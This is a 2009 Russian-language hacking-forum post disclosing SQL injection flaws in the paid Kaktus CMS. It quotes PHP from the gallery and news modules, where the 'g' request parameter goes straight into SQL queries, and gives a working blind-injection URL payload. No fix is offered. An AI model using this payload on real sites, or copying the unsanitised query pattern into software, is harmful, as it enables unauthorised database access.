Форум АНТИЧАТ - Обзор уязвимостей в платных CMS

#25

29.04.2009, 14:16

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

Кактус CMS
Сайт: http://cms.kaktus.kiev.ua/

SQL-injection

Уязвимый код:
gal_pages.php

PHP код:


		
			
. . .

$id_group = $_REQUEST['g'];

if ( $id_group != "" )

{

    $wheregroup = " AND ig.id_group=".$id_group;

}

if ( !( $count = mysql_query( "\n\t\t\t\tSELECT COUNT(g.id_image)\n\t\t\t\t\tFROM gallery g\n\t\t\t\t\t\tLEFT JOIN gallery_itemgroups ig\n\t\t\t\t\t\tON ig.id_image=g.id_image\n\t\t\t\t\t\tLEFT JOIN gallery_groups gg\n\t\t\t\t\t\tON gg.id_group=ig.id_group\n\t\t\t\tWHERE 1=1 ".$wheregroup." AND (gg.id_group IS NULL OR gg.active='1')\n\t\t" ) ) )

{

    exit( mysql_error( ) );

}

$count = mysql_fetch_row( $count );

. . .

Эксплуатация:

Цитата:

site.com/gallery?g=10+and+substring(version(),1,1)=5--+

Аналогично в модуле Новости

Уязвимый код:
news_pages.php

PHP код:


		
			
. . .

$id_group = $_REQUEST['g'];

if ( $id_group != "" )

{

    $wheregroup = " AND n.id_group=".$id_group;

}

 . . .

$count = mysql_queryresultfield( "\n\t\t\t\tSELECT COUNT(id_news)\n\t\t\t\tFROM news n\n\t\t\t\t\tLEFT JOIN news_groups ng\n\t\t\t\t\tON ng.id_group=n.id_group\n\t\t\t\t\tLEFT JOIN core_lang_varchar l\n\t\t\t\t\tON l.id=n.id_title AND l.lang=".LANG.( "\t\t\t\t\t\n\t\t\t\tWHERE l.value<>'' AND n.kind=".$kind." {$wheregroup} AND (n.id_group IS NULL OR ng.active='1') {$monthfilter}\n\t\t" ) );